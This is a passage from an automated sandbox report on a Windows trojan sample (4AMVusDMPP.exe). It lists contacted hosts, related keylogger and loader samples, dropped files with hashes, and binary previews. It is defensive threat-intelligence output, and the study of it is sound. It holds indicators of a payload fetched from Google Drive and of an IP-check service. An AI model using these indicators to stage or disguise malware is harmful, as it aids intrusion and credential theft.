                                  https://drive.google.com/4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003245000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    142.250.181.238
                                    drive.google.comUnited States
                                    15169GOOGLEUSfalse
                                    193.122.130.0
                                    checkip.dyndns.comUnited States
                                    31898ORACLE-BMC-31898USfalse
                                    172.217.16.193
                                    drive.usercontent.google.comUnited States
                                    15169GOOGLEUSfalse
                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1588355
                                    Start date and time:2025-01-11 01:13:43 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 6m 45s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:12
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:4AMVusDMPP.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:815d6b508fab5d16a8190a479fb4b72a3916d9afe21393eeb506098cb1a93c3a.exe
                                    Detection:MAL
                                    Classification:mal76.troj.evad.winEXE@4/13@3/3
                                    EGA Information:
                                    • Successful, ratio: 50%
                                    HCA Information:
                                    • Successful, ratio: 90%
                                    • Number of executed functions: 59
                                    • Number of non-executed functions: 71
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.189.173.22, 4.175.87.197, 40.126.32.134, 13.107.246.45
                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target 4AMVusDMPP.exe, PID 4216 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: 4AMVusDMPP.exe
                                    TimeTypeDescription
                                    19:16:01API Interceptor1x Sleep call for process: WerFault.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    193.122.130.0tVuAoupHhZ.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                    • checkip.dyndns.org/
                                    wymvwQ4mC4.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    VQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                    • checkip.dyndns.org/
                                    zAK7HHniGW.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    B3aqD8srjF.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    VIAmJUhQ54.exeGet hashmaliciousMassLogger RATBrowse
                                    • checkip.dyndns.org/
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    checkip.dyndns.comh1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 193.122.6.168
                                    tVuAoupHhZ.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 193.122.130.0
                                    TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 132.226.247.73
                                    Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 132.226.247.73
                                    WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                    • 193.122.130.0
                                    wymvwQ4mC4.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 193.122.130.0
                                    H75MnQEha8.exeGet hashmaliciousMassLogger RATBrowse
                                    • 132.226.8.169
                                    WGi85dsMNp.exeGet hashmaliciousGuLoaderBrowse
                                    • 158.101.44.242
                                    3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 158.101.44.242
                                    2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                    • 193.122.6.168
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    ORACLE-BMC-31898USh1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 193.122.6.168
                                    tVuAoupHhZ.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 193.122.130.0
                                    phish_alert_sp2_2.0.0.0(4).emlGet hashmaliciousUnknownBrowse
                                    • 192.29.202.93
                                    https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351Get hashmaliciousUnknownBrowse
                                    • 192.29.202.93
                                    https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351Get hashmaliciousUnknownBrowse
                                    • 192.29.202.93
                                    WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                    • 193.122.130.0
                                    wymvwQ4mC4.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 193.122.130.0
                                    WGi85dsMNp.exeGet hashmaliciousGuLoaderBrowse
                                    • 158.101.44.242
                                    3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 158.101.44.242
                                    2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                    • 193.122.6.168
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    37f463bf4616ecd445d4a1937da06e19Cpfkf79Rzk.exeGet hashmaliciousGuLoaderBrowse
                                    • 142.250.181.238
                                    • 172.217.16.193
                                    TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 142.250.181.238
                                    • 172.217.16.193
                                    Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 142.250.181.238
                                    • 172.217.16.193
                                    WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                    • 142.250.181.238
                                    • 172.217.16.193
                                    TVPfW4WUdj.exeGet hashmaliciousGuLoaderBrowse
                                    • 142.250.181.238
                                    • 172.217.16.193
                                    WGi85dsMNp.exeGet hashmaliciousGuLoaderBrowse
                                    • 142.250.181.238
                                    • 172.217.16.193
                                    WtZl31OLfA.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 142.250.181.238
                                    • 172.217.16.193
                                    czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                    • 142.250.181.238
                                    • 172.217.16.193
                                    Setup.exeGet hashmaliciousUnknownBrowse
                                    • 142.250.181.238
                                    • 172.217.16.193
                                    rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                    • 142.250.181.238
                                    • 172.217.16.193
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dllWGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                      WGi85dsMNp.exeGet hashmaliciousGuLoaderBrowse
                                        czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                          rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                            b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                              9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                  V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                    2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                      6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):1.2246975261220179
                                                        Encrypted:false
                                                        SSDEEP:192:IZGZ1ZcgbT0BU/rSdjYmFrvumKzuiF7Z24IO8aj:h1ZcKABU/rSdjnumKzuiF7Y4IO8aj
                                                        MD5:0C976B8E75C04B16EEC7E2CCDB325E20
                                                        SHA1:C357B4CCA00833E2DCCD951B914332B19FC07895
                                                        SHA-256:98144B5E1ED499CE582D02FACB0CE306BAED470AD096BCE1D40D2A1E6EF80BDB
                                                        SHA-512:EA5441B8D4BBAF94DA42ECB046B28B9BA649981996B9B59D9A740A80DA257742D50522C408368DAD526906F159292CD4587D8EB9A89116E708295CF3408A88C1
                                                        Malicious:true
                                                        Reputation:low
                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.2.8.1.4.2.3.3.0.4.9.1.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.0.2.8.1.4.4.9.0.8.5.9.0.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.5.4.8.f.4.d.b.-.b.4.0.a.-.4.d.e.d.-.8.9.e.9.-.2.a.6.e.c.f.0.6.6.1.7.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.3.a.7.a.d.0.a.-.f.2.b.2.-.4.d.7.f.-.a.b.7.0.-.c.5.3.7.e.d.2.9.2.8.3.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.4.A.M.V.u.s.D.M.P.P...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.s.u.p.r.a.o.c.u.l.a.r. .t.a.i.l.o.r.i.z.e.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.7.8.-.0.0.0.1.-.0.0.1.3.-.4.d.6.a.-.0.e.e.8.b.d.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.7.5.6.a.f.7.0.8.d.6.2.5.a.d.9.1.d.7.b.9.3.c.7.8.2.2.5.0.2.0.0.0.0.0.0.0.9.0.4.!.0.0.0.0.1.7.5.7.c.8.0.0.b.7.6.5.3.4.5.d.5.1.a.2.6.
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 00:15:44 2025, 0x1205a4 type
                                                        Category:dropped
                                                        Size (bytes):280554
                                                        Entropy (8bit):3.758471502062987
                                                        Encrypted:false
                                                        SSDEEP:3072:S4MT45X6yw5gZyp6L4uEqqzTLTgQpdPrWe:TOL2ZywL4fjTgSdJ
                                                        MD5:255AC1826754DA840B69C25D47DD7BFB
                                                        SHA1:A096F18A04195709A8DC380AF67E64C073E7C6CF
                                                        SHA-256:956215038FD2FA2B9DB4689A3EA03EDDD78CE8040C8BE45A8C9E19078FEB05A2
                                                        SHA-512:9C2BEB6EFE1B74CBDC19023B9A1765CFD23F2832257B5712C9B76AEF81133C7FD3A6BE8D566F03E6B5E1489469045C8025B91B7A1BECCDCD4AA88F53FCF03D0C
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:MDMP..a..... .......0..g............t............"..|........%..._..........T.......8...........T........... c...............,..........................................................................................eJ..............GenuineIntel............T.......x......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):6338
                                                        Entropy (8bit):3.724583943526375
                                                        Encrypted:false
                                                        SSDEEP:192:R6l7wVeJ5X6IZ0YU40dprR889b6Ksft+m:R6lXJJ6IZ0YU40xp6pfN
                                                        MD5:0F0BC28A956194AAAE53DBE29ED4DD2A
                                                        SHA1:BDA1295CF3E702B2B953BA657E8B410449170373
                                                        SHA-256:7D26FA3C7DAD230C2041586ADCAB88366B51F49B54E023EF681554AB8B5B363B
                                                        SHA-512:C571EDA62E51E15AB504E0DAE920AED5E45885D71D45CA52D84282901149E68B461EADED1A57A2C015D5612E09AF3790068D08417B44E462307BB13ACC9243A8
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.1.6.<./.P.i.
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):4672
                                                        Entropy (8bit):4.504038271592486
                                                        Encrypted:false
                                                        SSDEEP:48:cvIwWl8zsTJg77aI9VqWpW8VYMYm8M4JbjFC+q8wh0wjwQRd:uIjftI7HL7VIJw/0wMQRd
                                                        MD5:222F5A0662A9F6BE1C3A03890A096681
                                                        SHA1:5522AAF1A9694BA7D11701D564F2FD958CBD1E60
                                                        SHA-256:C140E884C1A786368045B0CB61C21BE21F98EC1023A413552709D31AD6A7234E
                                                        SHA-512:BFEC5BAECA13C9F71747D9E5DEE297981F07692103757F344BBB9EE2870BC256CC89044F11C0F63F7F03217373EA887E3E2422DD28DF4ACBDDB97BA0AA3CB736
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670518" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                        Process:C:\Users\user\Desktop\4AMVusDMPP.exe
                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 2560x2560, components 3
                                                        Category:dropped
                                                        Size (bytes):484658
                                                        Entropy (8bit):7.809711763657168
                                                        Encrypted:false
                                                        SSDEEP:12288:W1S3xo63wl4biprI2S4WwWEcwxg9dvVAxZOCLF0DB:Wo3xX3y4bz2lWwWo6rSTZyd
                                                        MD5:5C727AE28F0DECF497FBB092BAE01B4E
                                                        SHA1:AADE364AE8C2C91C6F59F85711B53078FB0763B7
                                                        SHA-256:77CCACF58330509839E17A6CFD6B17FE3DE31577D8E2C37DC413839BA2FEEC80
                                                        SHA-512:5246C0FBA41DF66AF89D986A3CEABC99B61DB9E9C217B28B2EC18AF31E3ED17C865387223CEB3A38A804243CF3307E07E557549026F49F52829BEBC4D4546C40
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:......JFIF.....,.,.....]http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.566ebc5, 2022/05/09-07:22:29 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmp:CreateDate="2018-04-27T15:00:27+08:00" xmp:ModifyDate="2022-09-22T14:01:54+08:00" xmp:MetadataDate="2022-09-22T14:01:54+08:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:b728d5c8-8822-6d4c-afc1-a393cb2a04ec"
                                                        Process:C:\Users\user\Desktop\4AMVusDMPP.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):112291
                                                        Entropy (8bit):1.249420131631438
                                                        Encrypted:false
                                                        SSDEEP:768:5R+BCpkJWjYWL2MxTVLvUjpGqik9JiAfWA2DBQwD1PzUH+HYZmIo7x31sT:WCZY21w0I2NZYD
                                                        MD5:4D1D72CFC5940B09DFBD7B65916F532E
                                                        SHA1:30A45798B534842002B103A36A3B907063F8A96C
                                                        SHA-256:479F1904096978F1011DF05D52021FAEEE028D4CF331024C965CED8AF1C8D496
                                                        SHA-512:048844A09E291903450188715BCDDF14F0F1F10BEAFBD005882EBF5D5E31A71D8F93EEBE788BD54B4AED2266C454F4DCA18AF4567977B7E773BBE29A38DEA45B
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:..........P............+......................................................................................................................X......n..(................G...................................m.........|.......................U.............`............l..............@}.........a........................................s............y.................N...............B...............w.e..........................................Q......*...................................................................................................a...........................f..................p..................t...........................................9.Q................@....................e................................................................:..............P.......S.........................P........................9..............._.......................(...............N............................................................H.T..........c..............................
                                                        Process:C:\Users\user\Desktop\4AMVusDMPP.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):286225
                                                        Entropy (8bit):7.710114949306163
                                                        Encrypted:false
                                                        SSDEEP:6144:tIDUHdfSOxO7G+xkFHmRKJCbqkLdzd2DI22C9pYV:t5xhC/6FHQGwqmB+I6S
                                                        MD5:34F265250B7ED15DC0990A62F24E4D46
                                                        SHA1:9B704DA4147DFCF5A8E79E6510344D69BFD4DA51
                                                        SHA-256:ED4A13E1A9C95FCE5A54AB84B479D07F8900E58C6A4B4CE71D442FA3171F4FF4
                                                        SHA-512:C990A4472DB4D9EE7E766DE924AB2A843971BC1624C8A79099709B27BBA04B5223C47362588C1DFD835CD45E14CD03E5D8BD17BC198858BB6AD38DCE316734D0
                                                        Malicious:false
                                                        Preview:...................................................::..'......00..................PPP..5555............k.......................C.))..EEE............................K.q.................ii..............v.......555.....................t...........S......JJ............-................................................====.OO...TT..*.j.....??................w.............{..................~............$$$..............................000.A..6666.........N...............|......A.....4444..[[.VVV....000.......:................K....tt.........--.H...............ww....2..U.......H.`.&&......F.a......%.s...............mmm.....yy..##.A..................................".............kkk..M...aaa..F..........ssss..............................................y.......9..WWWWWW...........%.........uuuuuu..K....................'.....,,..............666.b...=............www..................._..@............OO............TT.........-........GG..V...............e...8.......tt......E......I.BBB...LL......
                                                        Process:C:\Users\user\Desktop\4AMVusDMPP.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):362089
                                                        Entropy (8bit):1.23992084267325
                                                        Encrypted:false
                                                        SSDEEP:768:xOeaameETrlE0+1mGOWb3h5WAV0hW+JSLSwzj2HlSdL0f6mhKZRaqOzWz6szt3cA:x+ds5dYOVxIW3hhdeRt6MeZ1W4vB
                                                        MD5:A4340182CDDD2EC1F1480360218343F9
                                                        SHA1:50EF929FEA713AA6FCC05E8B75F497B7946B285B
                                                        SHA-256:B91E5B1FF5756F0B93DCF11CBC8B467CDA0C5792DE24D27EC86E7C74388B44B3
                                                        SHA-512:021F198AFF7CCED92912C74FC97D1919A9E059F22E99AB1236FBAA36C16B520C07B78F47FC01FCFAC1B53A87CDAE3E440D0589FA2844612617FAB2EDB64A3573
                                                        Malicious:false
                                                        Preview:..........F.............................i.....................B.........................................b..Et.............................O...........h...............................................................................8..........n.....................w.................../.......|.......'........,..........(...........................W......#..................................................................................................=..........................]..........q................................................[.................2....S............................"...................................$!..............................=.......................................[f.................................................................................................................V.............................w...................................................$.............................................................j...........h.............J..............
                                                        Process:C:\Users\user\Desktop\4AMVusDMPP.exe
                                                        File Type:FoxPro FPT, blocks size 22, next free block index 285212672, field type 0
                                                        Category:dropped
                                                        Size (bytes):139354
                                                        Entropy (8bit):1.2473328695625903
                                                        Encrypted:false
                                                        SSDEEP:768:9OsMSh8lSnJGyUzWZsO2ipzPFmDZC9kpzroto48tf2+5lVp:9delFlqNawgJp
                                                        MD5:B0FB6B583D6902DE58E1202D12BA4832
                                                        SHA1:7F585B5C3A4581CE76E373C78A6513F157B20480
                                                        SHA-256:E6EA5F6D0C7F5FA407269C7F4FF6D97149B7611071BF5BF6C454B810501AE661
                                                        SHA-512:E0894FFBD76C3476DC083DAFD24F88964BF6E09E4CA955766B43FE73A764A00247C930E9996652A22B57B27826CD94F88B8178514060CA398DE568675F9E4571
                                                        Malicious:false
                                                        Preview:.......................................|...................................................................+................$......&....A........................................................Z.....................................A...............!.....Y........................l..........9..................c.............f.................F...".................................................h.......................................\..............J............................5......t.....E.................q........................:......^....................................................................................I..........................................................x......W....................................................................................M...........................X..............................,..................m.......................................................................................................................J........ ...F...........
                                                        Process:C:\Users\user\Desktop\4AMVusDMPP.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):29090
                                                        Entropy (8bit):4.557557000479259
                                                        Encrypted:false
                                                        SSDEEP:768:pHSuQk1y9dJm5jpRjBzovMg5UmxBCedq+:pHb0yRjB5ga+r3
                                                        MD5:E6704DB94EBC651D67A06C37F49BE45B
                                                        SHA1:291DDC7027CB3DEE53C9D67B2EA8200AF11352D2
                                                        SHA-256:EB2552A216C6B17EDCD5C758F162A778047B8EB25F7927C48591FBE87F7EF21C
                                                        SHA-512:4DAB316D438F748E21CCD8865D43BE332712A3BA2A12B7C53FB023E8D59F0429D39E03702E9C20A82B02ECD27133107C448722354E41E382949819EEEBC87542
                                                        Malicious:false
                                                        Preview:...............h................uu.......................................rrr......... .<...a..............`................0..........hh.b.BBBBB........:::.M.....=......;;;.**...-...........s..................ttttttt..$..&..........__......)))))))))..mmm............6.......t................i.............0.....##.......N..........................%.p....................Z...SS........+..................j.FFFFF..............SS...%...ll.....0.....a..........CCC..........```..........BB...........4.......................]........................!!......c........r....r..,.................ttt.......Z........................................:::::...........|................................m...........................HH.../....hhh.......H.............0...................................>....9.........'.H............................IIIIIII...................44..D..................K...RR...............{{.tt.....S.O.......MM......D.......#.......A...9....???.......t...U..............L......p........
                                                        Process:C:\Users\user\Desktop\4AMVusDMPP.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):12288
                                                        Entropy (8bit):5.719859767584478
                                                        Encrypted:false
                                                        SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                        MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                        SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                        SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                        SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: WGi85dsMNp.exe, Detection: malicious, Browse
                                                        • Filename: WGi85dsMNp.exe, Detection: malicious, Browse
                                                        • Filename: czHx16QwGQ.exe, Detection: malicious, Browse
                                                        • Filename: rXKfKM0T49.exe, Detection: malicious, Browse
                                                        • Filename: b5BQbAhwVD.exe, Detection: malicious, Browse
                                                        • Filename: 9Yn5tjyOgT.exe, Detection: malicious, Browse
                                                        • Filename: 6ZoBPR3isG.exe, Detection: malicious, Browse
                                                        • Filename: V7OHj6ISEo.exe, Detection: malicious, Browse
                                                        • Filename: 2CQ2zMn0hb.exe, Detection: malicious, Browse
                                                        • Filename: 6mGpn6kupm.exe, Detection: malicious, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\4AMVusDMPP.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1439902
                                                        Entropy (8bit):5.50423023217672
                                                        Encrypted:false
                                                        SSDEEP:24576:vI5xhHFHNZm2Ro3xX3y4bz2lWwWo6rSTZye:+tZtRoBXbz2luo6rS1ye
                                                        MD5:C0586E009617EADA0D82E3C7809D4169
                                                        SHA1:DE3E11D2209A23DEECC8CBA975042CBAD8E49C5F
                                                        SHA-256:7A3A77EEC2C93A1792B7B2D3BE81E4E3A8296AC20798B163876B768480E8396F
                                                        SHA-512:ECF2323E8C6AE3438A1BF87DAFFD8910512B02E8C94FA0244192B2DA2DD7711F58135D98A1C9D2316CD19A8C0B6354D8D7D198F84683655EC16212D3997026E3
                                                        Malicious:false
                                                        Preview:,6......,.......,.......\........!.......4.......5..........................M...i............................H..............................................................................................................................................................................G...J...............h...............................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:MS Windows registry file, NT/2000 or above
